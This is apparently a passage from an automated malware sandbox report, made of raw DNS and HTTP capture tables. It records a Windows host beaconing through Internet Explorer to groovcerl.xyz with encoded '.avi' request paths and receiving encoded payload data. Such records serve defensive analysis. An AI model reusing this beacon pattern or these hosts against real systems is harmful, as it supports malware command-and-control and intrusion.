                                                                                                                                                                                                  Nov 25, 2020 19:08:04.191087008 CET53547218.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 25, 2020 19:08:13.404321909 CET6282653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 25, 2020 19:08:13.441822052 CET53628268.8.8.8192.168.2.7

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  Nov 25, 2020 19:06:19.152002096 CET192.168.2.78.8.8.80x57b2Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:21.021868944 CET192.168.2.78.8.8.80xb0cfStandard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:21.397030115 CET192.168.2.78.8.8.80xc2dcStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.012271881 CET192.168.2.78.8.8.80xb3aeStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.563325882 CET192.168.2.78.8.8.80xb0c3Standard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.675216913 CET192.168.2.78.8.8.80x5f57Standard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.728153944 CET192.168.2.78.8.8.80x74feStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:24.368446112 CET192.168.2.78.8.8.80xd1d3Standard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:24.803705931 CET192.168.2.78.8.8.80x3282Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.128168106 CET192.168.2.78.8.8.80x768fStandard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.151326895 CET192.168.2.78.8.8.80xfb42Standard query (0)s.yimg.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:08.903095007 CET192.168.2.78.8.8.80x583Standard query (0)groovcerl.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:11.926423073 CET192.168.2.78.8.8.80x9ebaStandard query (0)groovcerl.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:15.046040058 CET192.168.2.78.8.8.80x8448Standard query (0)groovcerl.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:55.478131056 CET192.168.2.78.8.8.80xd066Standard query (0)resolver1.opendns.comA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  Nov 25, 2020 19:06:19.179038048 CET8.8.8.8192.168.2.70x57b2No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:21.065136909 CET8.8.8.8192.168.2.70xb0cfNo error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:21.442884922 CET8.8.8.8192.168.2.70xc2dcNo error (0)contextual.media.net104.80.21.70A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.058299065 CET8.8.8.8192.168.2.70xb3aeNo error (0)lg3.media.net104.80.21.70A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.606451988 CET8.8.8.8192.168.2.70xb0c3No error (0)hblg.media.net104.80.21.70A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.711731911 CET8.8.8.8192.168.2.70x5f57No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.765187979 CET8.8.8.8192.168.2.70x74feNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:23.910701990 CET8.8.8.8192.168.2.70x453No error (0)consentdeliveryfd.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:24.405493975 CET8.8.8.8192.168.2.70xd1d3No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:24.830702066 CET8.8.8.8192.168.2.70x3282No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:24.830702066 CET8.8.8.8192.168.2.70x3282No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.165539980 CET8.8.8.8192.168.2.70x768fNo error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.165539980 CET8.8.8.8192.168.2.70x768fNo error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.165539980 CET8.8.8.8192.168.2.70x768fNo error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.165539980 CET8.8.8.8192.168.2.70x768fNo error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.165539980 CET8.8.8.8192.168.2.70x768fNo error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.186822891 CET8.8.8.8192.168.2.70xfb42No error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.186822891 CET8.8.8.8192.168.2.70xfb42No error (0)edge.gycpi.b.yahoodns.net87.248.118.23A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.186822891 CET8.8.8.8192.168.2.70xfb42No error (0)edge.gycpi.b.yahoodns.net87.248.118.22A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:08.946619034 CET8.8.8.8192.168.2.70x583No error (0)groovcerl.xyz162.0.213.230A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:11.975002050 CET8.8.8.8192.168.2.70x9ebaNo error (0)groovcerl.xyz162.0.213.230A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:15.081686020 CET8.8.8.8192.168.2.70x8448No error (0)groovcerl.xyz162.0.213.230A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 25, 2020 19:07:55.518860102 CET8.8.8.8192.168.2.70xd066No error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • groovcerl.xyz
                                                                                                                                                                                                  • 63.250.47.200

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.749766162.0.213.23080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 25, 2020 19:07:09.128911972 CET2975OUTGET /images/_2B9CjQr1xAViB33KLEZFl/2znYpePgiBaym/Zcv7ASeM/RH1S7KGYN6l8JiGWg4e9nXb/NQZq1SSxJi/mc5yp3cGYcmh41_2B/sgGwdOmEGgkx/5KQWfRKKgWK/Xt2u1awqIScbRf/sgOFy4dR5ErSJgERDDH7r/_2FEWj4i_2BFzqwq/_2BgPzFAK8qrY4B/dRdOEARjck/1iLUKWQnn/K.avi HTTP/1.1
                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  Host: groovcerl.xyz
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Nov 25, 2020 19:07:09.315493107 CET2977INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:09 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                  Set-Cookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; path=/; domain=.groovcerl.xyz
                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Set-Cookie: lang=en; expires=Fri, 25-Dec-2020 18:07:09 GMT; path=/; domain=.groovcerl.xyz
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Data Raw: 33 38 38 36 30 0d 0a 73 67 53 62 2f 4d 4b 64 4f 35 51 64 50 5a 44 55 48 67 77 42 56 45 7a 4e 4e 2b 36 4a 6f 4b 46 42 4e 63 69 6c 77 51 72 7a 39 63 6b 46 48 79 4b 6f 51 37 36 31 38 49 65 57 75 78 70 58 6e 4a 69 31 77 50 2b 68 70 48 4c 2f 47 47 7a 75 30 6a 51 41 54 35 4f 52 79 56 33 72 53 78 30 47 65 66 65 43 4c 55 32 6d 43 41 5a 2b 55 4b 41 72 6d 35 43 65 2b 77 43 6b 76 63 62 53 44 58 44 4d 2b 64 35 41 4b 4d 71 39 36 73 42 36 7a 54 61 34 63 74 4c 45 75 44 6d 44 42 34 6c 62 72 38 36 50 36 43 4e 74 58 37 6e 6d 68 5a 72 43 61 62 5a 72 58 74 79 52 41 4e 36 62 53 66 6a 4c 44 46 35 34 55 38 49 71 63 59 72 54 63 39 30 54 2f 38 66 66 78 32 33 4f 70 4c 42 35 61 76 32 36 49 77 45 37 76 45 4e 6b 53 67 44 4f 2f 2f 6e 6b 38 70 38 31 71 5a 41 77 6a 54 46 58 5a 34 53 4a 44 30 71 66 59 41 68 4d 67 32 6a 69 51 2b 38 6c 62 35 68 4e 50 59 50 44 53 41 5a 68 45 32 4b 7a 58 66 6a 56 33 43 75 6b 50 6a 48 4d 34 6a 33 5a 61 37 78 46 61 33 48 54 64 75 6f 55 41 4d 59 41 37 61 6d 73 4d 38 2b 4d 6a 63 4e 5a 37 78 39 63 48 56 6e 58 73 62 77 66 54 39 2f 44 41 79 4f 79 72 6e 77 62 75 43 49 36 35 48 42 4d 77 42 6f 47 64 5a 67 74 57 73 52 6a 6d 44 6d 53 79 32 48 4a 76 70 6a 65 45 66 41 49 53 58 41 38 42 63 6f 34 72 67 44 79 53 42 76 4b 4e 74 64 79 31 45 57 5a 39 2f 2b 37 6c 51 49 36 4e 58 72 48 56 78 34 55 31 49 79 31 64 5a 77 78 59 73 45 42 4b 51 73 64 59 4d 72 55 34 33 41 45 47 59 76 78 65 59 65 4a 49 51 32 6f 32 36 70 33 2f 55 61 5a 59 38 76 42 46 54 43 39 42 50 47 69 45 77 65 53 54 55 6f 37 71 76 75 70 70 46 68 47 65 45 6e 64 42 5a 32 51 4a 69 72 50 46 75 6d 4b 53 78 50 73 6f 2f 61 55 55 65 6b 76 6c 58 71 74 6f 4d 6b 48 45 78 35 35 32 4d 41 79 76 63 6a 72 72 44 39 2b 51 54 55 44 70 6d 59 64 47 48 67 31 72 39 49 52 4f 79 75 36 5a 52 59 32 47 77 48 31 31 77 5a 6d 68 56 6e 55 65 41 6d 59 48 4c 47 75 6b 74 49 2b 51 36 65 47 42 33 34 49 48 78 31 39 37 73 37 64 31 73 50 4f 73 58 79 62 55 6c 69 64 4f 4b 6c 50 73 69 36 44 54 55 2f 43 30 41 30 4e 72 5a 76 35 71 6c 36 50 6e 44 32 67 57 33 68 53 55 6e 37 41 30 51 61 58 4d 4a 45 79 33 73 50 69 2b 36 69 6b 39 78 69 5a 44 4a 49 37 73 65 6d 38 30 64 44 47 39 6a 30 56 6f 65 4f 64 4f 6d 57 2f 41 2b 66 45 65 35 58 2f 69 4c 75 69 51 30 45 48 56 2f 42 7a 63 6d 57 38 77 56 38 6c 52 4e 61 42 51 4c 65 6b 65 39 67 53 4f 44 68 72 77 67 47 56 62 7a 72 2b 43 75 53 62 58 71 6b 33 7a 59 50 31 36 31 35 6f 30 61
                                                                                                                                                                                                  Data Ascii: 38860sgSb/MKdO5QdPZDUHgwBVEzNN+6JoKFBNcilwQrz9ckFHyKoQ7618IeWuxpXnJi1wP+hpHL/GGzu0jQAT5ORyV3rSx0GefeCLU2mCAZ+UKArm5Ce+wCkvcbSDXDM+d5AKMq96sB6zTa4ctLEuDmDB4lbr86P6CNtX7nmhZrCabZrXtyRAN6bSfjLDF54U8IqcYrTc90T/8ffx23OpLB5av26IwE7vENkSgDO//nk8p81qZAwjTFXZ4SJD0qfYAhMg2jiQ+8lb5hNPYPDSAZhE2KzXfjV3CukPjHM4j3Za7xFa3HTduoUAMYA7amsM8+MjcNZ7x9cHVnXsbwfT9/DAyOyrnwbuCI65HBMwBoGdZgtWsRjmDmSy2HJvpjeEfAISXA8Bco4rgDySBvKNtdy1EWZ9/+7lQI6NXrHVx4U1Iy1dZwxYsEBKQsdYMrU43AEGYvxeYeJIQ2o26p3/UaZY8vBFTC9BPGiEweSTUo7qvuppFhGeEndBZ2QJirPFumKSxPso/aUUekvlXqtoMkHEx552MAyvcjrrD9+QTUDpmYdGHg1r9IROyu6ZRY2GwH11wZmhVnUeAmYHLGuktI+Q6eGB34IHx197s7d1sPOsXybUlidOKlPsi6DTU/C0A0NrZv5ql6PnD2gW3hSUn7A0QaXMJEy3sPi+6ik9xiZDJI7sem80dDG9j0VoeOdOmW/A+fEe5X/iLuiQ0EHV/BzcmW8wV8lRNaBQLeke9gSODhrwgGVbzr+CuSbXqk3zYP1615o0a
                                                                                                                                                                                                  Nov 25, 2020 19:07:10.070240021 CET3221OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: groovcerl.xyz
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
                                                                                                                                                                                                  Nov 25, 2020 19:07:10.464745998 CET3221OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: groovcerl.xyz
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: PHPSESSID=d50vmo31p61r9jkm7vp6r303t1; lang=en
                                                                                                                                                                                                  Nov 25, 2020 19:07:10.630757093 CET3251INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:10 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                  Last-Modified: Wed, 18 Nov 2020 11:00:08 GMT
                                                                                                                                                                                                  ETag: "1536-5b45f83b33946"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 5430
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                  Data Raw: 00 00 01 00 02 00 10 10 00 00 00 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 00 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 87 73 f7 9c 87 73 f9 9c 87 73 f7 9c 87 73 77 9c 87 72 03 ff ff ff 01 9c 87 73 09 9c 87 73 0f 9c 87 73 0d 9b 87 73 05 ff ff ff 01 9c 87 73 15 9c 87 73 c7 9c 87 73 f9 9c 87 73 f9 9c 87 73 85 9c 87 73 f9 9c 87 72 f9 9c 87 73 7b 9c 87 73 05 9c 87 73 23 9c 87 73 7f 9c 87 73 c3 9b 87 72 d3 9c 87 73 cf 9c 87 73 ad 9c 87 73 5b 9c 87 73 0d 9c 87 73 1b 9c 87 73 c5 9b 87 73 ff 9c 87 73 85 9c 87 73 f7 9c 87 73 7d 9c 87 73 07 9c 87 73 57 9c 87 72 db 9c 87 73 ab 9c 87 73 6d 9c 87 73 4b 9c 87 73 43 9c 87 73 77 9c 87 73 cf 9c 87 73 b7 9b 86 73 25 9c 87 73 21 9c 87 73 cb 9c 87 73 87 9c 87 73 7f 9c 87 73 05 9c 87 73 55 9c 87 73 e1 9c 87 73 59 9c 87 73 81 9c 87 73 df 9c 87 73 c9 9b 86 72 23 ff ff ff 01 9c 87 73 13 9c 87 73 97 9c 87 73 cd 9c 87 73 19 9c 87 72 25 9c 87 73 5b 9c 87 73 03 9c 87 73 1d 9c 87 73 d9 9c 87 73 5d 9c 87 73 0b 9b 87 72 ef 9c 87 73 53 9b 87 73 bf 9c 87 73 71 ff ff ff 01 ff ff ff 01 9c 87 73 0b 9c 87 73 a5 9c 87 73 95 9c 87 73 03 9c 87 73 03 ff ff ff 01 9c 87 73 75 9c 87 73 b5 9c 87 73 07 ff ff ff 01 9c 87 73 c1 9c 87 73 db 9c 87 73 e7 9c 87 73 41 ff ff ff 01 ff ff ff 01 ff ff ff 01 9c 86 73 25 9b 87 73 d9 9c 87 73 23 ff ff ff 01 9c 87 72 07 9c 87 72 bb 9c 87 73 5d ff ff ff 01 ff ff ff 01 9c 87 73 1b 9c 87 73 db 9c 87 73 6b 9c 87 73 03 9c 87 73 03 ff ff ff 01 ff ff ff 01 9c 87 73 03 9c 87 73 af 9c 87 73 5d ff ff ff 01 9c 87 73 0d 9c 87 72 cd 9c 87 73 37 ff ff ff 01 ff ff ff 01 9c 86 73 09 9c 87 73 c9 9c 87 72 91 9c 86 72 a3 9c 87 73 81 9c 86 72 05 ff ff ff 01 ff ff ff 01 9b 87 73 85 9c 87 73 7f ff ff ff 01 9c 87 73 0d 9c 87 73 cb 9b 87 73 37 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 69 9c 87 73 3f 9c 87 73 37 9c 87 73 13 ff ff ff 01 ff ff ff 01 9b 87 73 83 9c 87 73 7f ff ff ff 01 9c 87 73 07 9c 87 73 b9 9c 87 72 57 ff ff ff 01 ff ff ff 01 9c 87 73 09 9c 87 73 c9 9c 87 73 97 9c 87 73 a9 9c 87 73 a9 9c 87 73 97 ff ff ff 01 ff ff ff 01 9c 87 73 ab 9c 87 73 5b ff ff ff 01 ff ff ff 01 9c 87 73 73 9c 87 73 ad 9c 87 73 05 ff ff ff 01 9c 87 73 09 9c 87 73 cd 9c 87 73 6d 9c 87 73 49 9c 87 73 3b 9c 87 73 07 ff ff ff 01 9c 87 73 21 9c 87 73 d3 9c 87 73 23 ff ff ff 01 9c 87 73 05 9c 87 73 1b 9b 87 73 d3 9c 87 73 51 ff ff ff 01 9b 86 73 09 9c 87 73 cb 9c 87 73 89 9b 87 72 83 9c 87 73 6d 9c 87 73 05 9c 87 72 07 9c 87 73 97 9b 87 72 91 9c 87 73 03 9c 87 73 05 9b 87 72 89 9c 87 73 07 9c 87 73 51 9c 87 73 d9 9c 87 72 4b 9c 87 73 07 9c 87 73 67 9c 86 73 27 ff ff ff 01 ff ff ff 01 9b 86 73 0d 9c 87 73 81 9c 87 73 c5 9c 87 73 17 9c 87 73 27 9c 87 73 5f 9c 87 73 f7 9c 87 73 85 9c 87 73 09 9b 87 72 51 9c 87 73 d3 9c 87 73 9d 9c 87 73 4b 9c 86 72 2f 9c 87 73 33 9c 87 73 61 9c 87 73 bd 9b 87 73 b1 9c 87 73 21 9c 87 73 23 9c 87 73 cd 9c 87 73 87 9c 87 73 f9 9c 86 73 f9 9c 87 73 83 9c 87 73 07 9c 87 73 1f 9c 87 73 79 9c 87 73 b9 9c 87 72 c5 9c 87 73 c3 9c 87 72 a7 9c 87 73 55 9c 87 72 0b 9c 87 73 1d 9c
                                                                                                                                                                                                  Data Ascii: h& ( @sssswrssssssssssrs{ss#ssrsss[sssssss}ssWrssmsKsCswsss%s!sssssUssYsssr#ssssr%s[ssss]srsSssqssssssussssssAs%ss#rrs]sssksssss]srs7ssrrsrsssss7sssis?s7sssssrWssssssss[sssssssmsIs;ss!ss#ssssQsssrsmsrsrssrssQsrKssgs'sssss's_sssrQsssKr/s3sasss!s#ssssssssysrsrsUrs


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  1192.168.2.749767162.0.213.23080C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 25, 2020 19:07:12.174215078 CET3257OUTGET /images/GHw2NFoi/uGw7IwXJCQkcQl1KQVbo_2B/820znWDaSW/Ov_2B4z8yJqAozhde/qBE2ImkkKvCH/VXQwRoWXG5R/k9cBAONcCOy6zC/schMO1Bz6Hv1XAWY_2Bj1/Epe_2FrlHpFxpDqb/wkcRD0A5Nn7ZtOM/LcznbG_2FsTdDMEgaN/jIHJPS5D0/Fp7e0qKKctEIDJT6MGkX/RCGhIjX0.avi HTTP/1.1
                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  Host: groovcerl.xyz
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cookie: lang=en; PHPSESSID=d50vmo31p61r9jkm7vp6r303t1
                                                                                                                                                                                                  Nov 25, 2020 19:07:12.362579107 CET3259INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Wed, 25 Nov 2020 18:07:12 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Data Raw: 34 37 64 62 63 0d 0a 35 4a 67 62 37 72 57 50 58 79 50 51 70 6f 4a 6b 4b 4c 56 44 4a 41 51 4b 36 4d 64 69 4c 67 37 4a 6e 49 69 33 52 63 44 55 35 50 78 70 4e 52 58 34 37 55 6b 58 6f 2b 76 53 66 5a 77 61 54 59 41 31 5a 33 5a 69 48 33 2f 33 76 4c 4b 37 2b 53 51 34 71 6c 73 31 4a 64 47 6b 43 49 74 56 33 6e 65 32 49 58 32 61 42 34 47 36 34 49 71 2f 6b 72 51 33 67 53 41 42 57 6f 44 42 74 6b 4b 39 68 34 4c 57 41 34 4f 6a 57 48 63 50 51 4c 51 62 63 49 6b 37 73 4d 4b 4a 51 35 37 49 73 30 31 53 33 55 63 30 33 73 35 38 6e 5a 70 4e 59 5a 63 5a 5a 53 63 57 7a 72 6d 36 4e 64 61 4f 72 78 58 46 43 4a 50 52 67 76 56 32 6a 2f 61 47 46 54 33 55 63 38 64 34 34 4d 32 71 32 44 76 70 4f 59 69 31 46 73 48 4f 4b 7a 31 64 5a 45 2f 43 35 37 71 58 75 70 35 59 6d 37 51 63 6a 68 2b 76 74 43 78 77 59 32 4d 69 75 39 70 4e 66 72 48 33 5a 51 65 48 58 62 53 71 57 4f 33 65 34 2b 62 2f 4c 4e 79 32 6c 59 6c 33 72 4d 6a 69 30 64 7a 76 69 35 66 57 59 70 38 69 53 6c 69 44 6a 65 2b 65 62 63 46 48 64 41 73 63 2b 77 4a 33 4a 31 64 54 4d 6b 54 76 36 39 57 4a 58 74 63 62 41 74 69 73 79 6a 63 31 39 54 31 72 54 49 38 4f 56 57 36 41 32 54 47 45 4a 2b 74 69 70 2f 77 70 31 77 68 42 65 78 39 41 6b 4d 4f 38 33 5a 73 35 4c 34 48 32 33 65 6b 5a 7a 56 74 36 50 34 63 71 4c 37 74 34 59 43 31 56 7a 41 4a 36 72 2b 4c 42 42 35 6e 69 52 65 50 52 33 4d 33 48 32 4b 59 76 49 50 7a 75 4e 69 72 4d 72 52 70 50 77 36 58 6e 75 2b 78 50 49 54 36 57 71 58 70 74 62 73 34 4f 55 56 48 70 34 38 72 52 78 79 39 52 4f 38 38 61 74 4d 64 37 61 59 51 6c 46 46 7a 36 68 63 6e 73 78 4f 6a 70 7a 45 66 4e 4e 77 78 32 32 65 58 66 59 41 36 6c 32 44 6c 4b 38 6b 73 30 50 2b 6f 65 52 66 62 62 43 32 4d 78 43 33 37 32 37 56 4a 4f 37 73 57 48 2b 36 78 33 41 79 78 41 36 56 57 32 4a 54 38 6d 49 57 34 5a 42 63 6f 57 37 4a 49 50 33 37 61 76 4b 31 74 58 74 77 55 65 77 73 6d 33 74 67 2b 61 57 33 37 57 4c 57 41 30 66 4d 6c 50 43 71 64 57 57 74 68 34 30 52 34 56 71 6a 67 6e 5a 48 69 2f 54 6c 53 4b 70 54 72 6f 48 38 4e 31 68 69 36 55 71 54 57 51 6b 31 78 47 63 73 4b 55 71 6a 30 67 63 2f 63 7a 66 38 7a 7a 45 58 73 44 73 38 4d 67 37 47 6a 35 2b 74 4e 75 4b 73 45 79 67 76 31 7a 6e 47 41 4f 6d 32 4a 42 44 66 55 46 58 2b 76 74 64 69 62 32 6d 4d 74 46 36 59 4a 52 75 4e 43 50 39 72 51 4f 6f 2b 47 70 54 54 72 36 32 61 35 52 56 68 65 71 34 35 4e 4a 34 50 39 6a 47 44 57 57 49 34 57 6e 74 75 45 47 5a 48 55 76 36 38 50 56 32 4f 64 7a 5a 77 56 59 79 33 46 56 73 52 33 6f 78 38 55 70 7a 47 42 43 4a 47 43 50 53 65 79 30 52 49 67 6e 2f 63 74 41 70 59 6c 37 2b 49 6c 55 73 68 35 2b 39 75 48 53 79 38 6d 37 36 4e 33 2b 41 77 6b 2b 6d 4a 68 37 2b 2b 48 6a 5a 57 78 49 75 64 6a 4b 61 2b 77 2f 41 63 48 51 49 73 65 6c 44 64 6b 56 7a 46 54 33 74 30 67 70 4f 35 62 6f 4a 5a 31 6d 35 4f 68 6e 70 6b 69 30 4d 34 6e 62 79 72 71 35 4d 55 64 48 61 77 32 6d 4a 47 43 4d 41 73 64 46 56 6b 50 42 58 47 6b 49 56 61 53 67 37 6e 4f 4d 49 6a 58 72 6e 50
